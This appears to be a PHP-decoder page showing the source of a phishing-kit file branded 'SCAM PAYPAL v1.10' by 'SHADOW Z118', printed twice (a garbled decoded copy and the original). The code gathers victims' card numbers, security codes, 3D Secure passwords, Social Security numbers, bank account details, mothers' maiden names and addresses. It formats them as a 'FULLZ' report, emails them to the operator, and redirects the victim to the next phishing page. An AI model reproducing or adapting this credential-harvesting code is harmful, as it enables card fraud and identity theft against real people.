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PHP Decode
<?php /* _____ _ _ ______ __ __ ..
Decoded Output download
_____ _ _ ______ __ __ ___
/ ____| | | | | |___ / /_ | /_ | / _ \
| (___ | |__ __ _ __| | ___ __ __ / / | | | | | (_) |
\___ \ | '_ \ / _` | / _` | / _ \ \ \ /\ / / / / - | | - | | - > _ <
____) | | | | | | (_| | | (_| | | (_) | \ V V / / /__ - | | - | | - | (_) |
|_____/ |_| |_| \__,_| \__,_| \___/ \_/\_/ /_____| |_| |_| \___/
# SCAM PAYPAL v1.10 #
# SHADOW Z118 #
$$$$$$$\ $$$$$$$\ $$\
$$ __$$\ $$ __$$\ $$ |
$$ | $$ |$$$$$$\ $$\ $$\ $$ | $$ |$$$$$$\ $$ |
$$$$$$$ |\____$$\ $$ | $$ |$$$$$$$ |\____$$\ $$ |
$$ ____/ $$$$$$$ |$$ | $$ |$$ ____/ $$$$$$$ |$$ |
$$ | $$ __$$ |$$ | $$ |$$ | $$ __$$ |$$ |
$$ | \$$$$$$$ |\$$$$$$$ |$$ | \$$$$$$$ |$$ |
\__| \_______| \____$$ |\__| \_______|\__|
$$\ $$ |
\$$$$$$ |
$TIME_DATE = date('H:i:s d/m/Y');
$Z118_MESSAGE .= "
<head><meta charset='UTF-8'></head>
<div style='font-size: 13px;font-family:monospace;font-weight:700;'>
################ <font style='color: #820000;'>ACCOUNT PAYPAL FULLZ</font> ####################<br/>
[ <font style='color: #0a5d00;'>CARDING INFORMATION</font> ]<br>
<font style='color:#9c0000;'></font> [Bank Name] = <font style='color:#0070ba;'>".$_SESSION['_cc_bank_']."</font><br>
<font style='color:#9c0000;'></font> [Cardholder's Name] = <font style='color:#0070ba;'>".$_SESSION['_nameoncard_']."</font><br>
<font style='color:#9c0000;'></font> [".$_SESSION['_cd_']." Card Number] = <font style='color:#0070ba;'>".$_SESSION['_cardnumber_']." (".$_SESSION['_cc_class_'].")</font><br>
<font style='color:#9c0000;'></font> [Card Security Code] = <font style='color:#0070ba;'>".$_SESSION['_csc_']."</font><br>
<font style='color:#9c0000;'></font> [Expiration Date] = <font style='color:#0070ba;'>".$_SESSION['_expdate_']."</font><br>
[ <font style='color: #0a5d00;'>VBV INFO INFORMATION</font> ]<br>
<font style='color:#9c0000;'></font> [Date Of Birth] = <font style='color:#0070ba;'>".$_SESSION['_dob_']."</font><br>
<font style='color:#9c0000;'></font> [3D Secure] = <font style='color:#0070ba;'>".$_SESSION['_password_vbv_']."</font><br>
if ($_SESSION['_country_'] == "UNITED STATES"){ // UNITED STATES
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Social Security Number] = <font style='color:#0070ba;'>".$_SESSION['_ssnnum_']."</font><br>
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Phone Number] = <font style='color:#0070ba;'>+".$_SESSION['_phone_']."-".$_SESSION['_phone_numb_']."</font><br>
elseif ($_SESSION['_country_'] == "CANADA"){ // CANADA
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Social Security Number] = <font style='color:#0070ba;'>".$_SESSION['_ssnnum_']."</font><br>
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Mother's Maiden Name] = <font style='color:#0070ba;'>".$_SESSION['_mmname_']."</font><br>
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Phone Number] = <font style='color:#0070ba;'>+".$_SESSION['_phone_']."-".$_SESSION['_phone_numb_']."</font><br>
elseif ($_SESSION['_country_'] == "UNITED KINGDOM" || $_SESSION['_country_'] == "IRELAND"){ // UNITED KINGDOM // IRELAND
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Sort Code] = <font style='color:#0070ba;'>".$_SESSION['_sortnum_']."</font><br>
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Account Number] = <font style='color:#0070ba;'>".$_SESSION['_accnumber_']."</font><br>
elseif($_SESSION['_country_'] == "AUSTRALIA"){ // AUSTRALIA
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Credit Limits] = <font style='color:#0070ba;'>".$_SESSION['_creditlimit_']."</font><br>
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [OSID] = <font style='color:#0070ba;'>".$_SESSION['_osid_']."</font><br>
elseif($_SESSION['_country_'] == "ITALY"){ // ITALY
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Codice Fiscale] = <font style='color:#0070ba;'>".$_SESSION['_codicefiscale_']."</font><br>
if($_SESSION['_country_'] == "SWITZERLAND" || $_SESSION['_country_'] == "GERMANY") { // SWITZERLAND || GERMANY
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Kontonummer] = <font style='color:#0070ba;'>".$_SESSION['_kontonummer_']."</font><br>
elseif($_SESSION['_country_'] == "GREECE"){ // GREECE
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Officiel ID] = <font style='color:#0070ba;'>".$_SESSION['_offid_']."</font><br>
$Z118_MESSAGE .= "
[ <font style='color: #0a5d00;'>BILLING INFORMATION</font> ]<br>
<font style='color:#9c0000;'></font> [Address line] = <font style='color:#0070ba;'>".$_SESSION['_address_']."</font><br>
<font style='color:#9c0000;'></font> [Country Name] = <font style='color:#0070ba;'>".ucwords(strtolower($_SESSION['_country_']))."</font><br>
<font style='color:#9c0000;'></font> [Town/City] = <font style='color:#0070ba;'>".$_SESSION['_city_']."</font><br>
<font style='color:#9c0000;'></font> [Province/State] = <font style='color:#0070ba;'>".$_SESSION['_state_']."</font><br>
<font style='color:#9c0000;'></font> [Postal/Zip Code] = <font style='color:#0070ba;'>".$_SESSION['_zipCode_']."</font><br>
[ <font style='color: #0a5d00;'>VICTIME INFORMATION</font> ]<br>
<font style='color:#9c0000;'></font> [IP INFO] = <font style='color:#0070ba;'>".$_SESSION['_ip_']."</font><br>
<font style='color:#9c0000;'></font> [TIME/DATE] = <font style='color:#0070ba;'>".$TIME_DATE."</font><br>
<font style='color:#9c0000;'></font> [BROWSER] = <font style='color:#0070ba;'>".Z118_Browser($_SERVER['HTTP_USER_AGENT'])." On ".Z118_OS($_SERVER['HTTP_USER_AGENT'])."</font><br>
################## <font style='color: #820000;'>BY SHADOW Z.1.1.8</font> #####################
$Z118_SUBJECT = "".$_SESSION['_cardholder_']." VBV FULLZ : ".$_SESSION['_ccglobal_']." ".$_SESSION['_global_']." ".$_SESSION['_login_email_']." ";
$Z118_HEADERS .= "From:SHADOW Z.1.1.8 <[email protected]>";
$Z118_HEADERS .= $_POST['eMailAdd']."
$Z118_HEADERS .= "MIME-Version: 1.0
$Z118_HEADERS .= "Content-type: text/html; charset=UTF-8
@mail($Z118_EMAIL, $Z118_SUBJECT, $Z118_MESSAGE, $Z118_HEADERS);
HEADER("Location: ../identity/?cmd=_session=".$_SESSION['_LOOKUP_CNTRCODE_']."&".md5(microtime())."&dispatch=".sha1(microtime())."", true, 303);
Did this file decode correctly?
Original Code
_____ _ _ ______ __ __ ___
/ ____| | | | | |___ / /_ | /_ | / _ \
| (___ | |__ __ _ __| | ___ __ __ / / | | | | | (_) |
\___ \ | '_ \ / _` | / _` | / _ \ \ \ /\ / / / / - | | - | | - > _ <
____) | | | | | | (_| | | (_| | | (_) | \ V V / / /__ - | | - | | - | (_) |
|_____/ |_| |_| \__,_| \__,_| \___/ \_/\_/ /_____| |_| |_| \___/
# SCAM PAYPAL v1.10 #
# SHADOW Z118 #
$$$$$$$\ $$$$$$$\ $$\
$$ __$$\ $$ __$$\ $$ |
$$ | $$ |$$$$$$\ $$\ $$\ $$ | $$ |$$$$$$\ $$ |
$$$$$$$ |\____$$\ $$ | $$ |$$$$$$$ |\____$$\ $$ |
$$ ____/ $$$$$$$ |$$ | $$ |$$ ____/ $$$$$$$ |$$ |
$$ | $$ __$$ |$$ | $$ |$$ | $$ __$$ |$$ |
$$ | \$$$$$$$ |\$$$$$$$ |$$ | \$$$$$$$ |$$ |
\__| \_______| \____$$ |\__| \_______|\__|
$$\ $$ |
\$$$$$$ |
$TIME_DATE = date('H:i:s d/m/Y');
$Z118_MESSAGE .= "
<head><meta charset='UTF-8'></head>
<div style='font-size: 13px;font-family:monospace;font-weight:700;'>
################ <font style='color: #820000;'>ACCOUNT PAYPAL FULLZ</font> ####################<br/>
[ <font style='color: #0a5d00;'>CARDING INFORMATION</font> ]<br>
<font style='color:#9c0000;'></font> [Bank Name] = <font style='color:#0070ba;'>".$_SESSION['_cc_bank_']."</font><br>
<font style='color:#9c0000;'></font> [Cardholder's Name] = <font style='color:#0070ba;'>".$_SESSION['_nameoncard_']."</font><br>
<font style='color:#9c0000;'></font> [".$_SESSION['_cd_']." Card Number] = <font style='color:#0070ba;'>".$_SESSION['_cardnumber_']." (".$_SESSION['_cc_class_'].")</font><br>
<font style='color:#9c0000;'></font> [Card Security Code] = <font style='color:#0070ba;'>".$_SESSION['_csc_']."</font><br>
<font style='color:#9c0000;'></font> [Expiration Date] = <font style='color:#0070ba;'>".$_SESSION['_expdate_']."</font><br>
[ <font style='color: #0a5d00;'>VBV INFO INFORMATION</font> ]<br>
<font style='color:#9c0000;'></font> [Date Of Birth] = <font style='color:#0070ba;'>".$_SESSION['_dob_']."</font><br>
<font style='color:#9c0000;'></font> [3D Secure] = <font style='color:#0070ba;'>".$_SESSION['_password_vbv_']."</font><br>\n";
if ($_SESSION['_country_'] == "UNITED STATES"){ // UNITED STATES
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Social Security Number] = <font style='color:#0070ba;'>".$_SESSION['_ssnnum_']."</font><br>\n";
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Phone Number] = <font style='color:#0070ba;'>+".$_SESSION['_phone_']."-".$_SESSION['_phone_numb_']."</font><br>\n";}
elseif ($_SESSION['_country_'] == "CANADA"){ // CANADA
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Social Security Number] = <font style='color:#0070ba;'>".$_SESSION['_ssnnum_']."</font><br>\n";
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Mother's Maiden Name] = <font style='color:#0070ba;'>".$_SESSION['_mmname_']."</font><br>\n";
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Phone Number] = <font style='color:#0070ba;'>+".$_SESSION['_phone_']."-".$_SESSION['_phone_numb_']."</font><br>\n";}
elseif ($_SESSION['_country_'] == "UNITED KINGDOM" || $_SESSION['_country_'] == "IRELAND"){ // UNITED KINGDOM // IRELAND
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Sort Code] = <font style='color:#0070ba;'>".$_SESSION['_sortnum_']."</font><br>\n";
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Account Number] = <font style='color:#0070ba;'>".$_SESSION['_accnumber_']."</font><br>\n";}
elseif($_SESSION['_country_'] == "AUSTRALIA"){ // AUSTRALIA
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Credit Limits] = <font style='color:#0070ba;'>".$_SESSION['_creditlimit_']."</font><br>\n";
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [OSID] = <font style='color:#0070ba;'>".$_SESSION['_osid_']."</font><br>\n";}
elseif($_SESSION['_country_'] == "ITALY"){ // ITALY
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Codice Fiscale] = <font style='color:#0070ba;'>".$_SESSION['_codicefiscale_']."</font><br>\n";}
if($_SESSION['_country_'] == "SWITZERLAND" || $_SESSION['_country_'] == "GERMANY") { // SWITZERLAND || GERMANY
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Kontonummer] = <font style='color:#0070ba;'>".$_SESSION['_kontonummer_']."</font><br>\n";}
elseif($_SESSION['_country_'] == "GREECE"){ // GREECE
$Z118_MESSAGE .= "<font style='color:#9c0000;'></font> [Officiel ID] = <font style='color:#0070ba;'>".$_SESSION['_offid_']."</font><br>\n";}
$Z118_MESSAGE .= "
[ <font style='color: #0a5d00;'>BILLING INFORMATION</font> ]<br>
<font style='color:#9c0000;'></font> [Address line] = <font style='color:#0070ba;'>".$_SESSION['_address_']."</font><br>
<font style='color:#9c0000;'></font> [Country Name] = <font style='color:#0070ba;'>".ucwords(strtolower($_SESSION['_country_']))."</font><br>
<font style='color:#9c0000;'></font> [Town/City] = <font style='color:#0070ba;'>".$_SESSION['_city_']."</font><br>
<font style='color:#9c0000;'></font> [Province/State] = <font style='color:#0070ba;'>".$_SESSION['_state_']."</font><br>
<font style='color:#9c0000;'></font> [Postal/Zip Code] = <font style='color:#0070ba;'>".$_SESSION['_zipCode_']."</font><br>
[ <font style='color: #0a5d00;'>VICTIME INFORMATION</font> ]<br>
<font style='color:#9c0000;'></font> [IP INFO] = <font style='color:#0070ba;'>".$_SESSION['_ip_']."</font><br>
<font style='color:#9c0000;'></font> [TIME/DATE] = <font style='color:#0070ba;'>".$TIME_DATE."</font><br>
<font style='color:#9c0000;'></font> [BROWSER] = <font style='color:#0070ba;'>".Z118_Browser($_SERVER['HTTP_USER_AGENT'])." On ".Z118_OS($_SERVER['HTTP_USER_AGENT'])."</font><br>
################## <font style='color: #820000;'>BY SHADOW Z.1.1.8</font> #####################
$Z118_SUBJECT = "".$_SESSION['_cardholder_']." VBV FULLZ : ".$_SESSION['_ccglobal_']." ".$_SESSION['_global_']." ".$_SESSION['_login_email_']." ";
$Z118_HEADERS .= "From:SHADOW Z.1.1.8 <[email protected]>";
$Z118_HEADERS .= $_POST['eMailAdd']."\n";
$Z118_HEADERS .= "MIME-Version: 1.0\n";
$Z118_HEADERS .= "Content-type: text/html; charset=UTF-8\n";
@mail($Z118_EMAIL, $Z118_SUBJECT, $Z118_MESSAGE, $Z118_HEADERS);
HEADER("Location: ../identity/?cmd=_session=".$_SESSION['_LOOKUP_CNTRCODE_']."&".md5(microtime())."&dispatch=".sha1(microtime())."", true, 303);
Function Calls
date | 1 |
session_start | 1 |
MD5 | 27ebc7bba5c93ead06768dd1e8ab2f1d |
Eval Count | 0 |
Decode Time | 96 ms |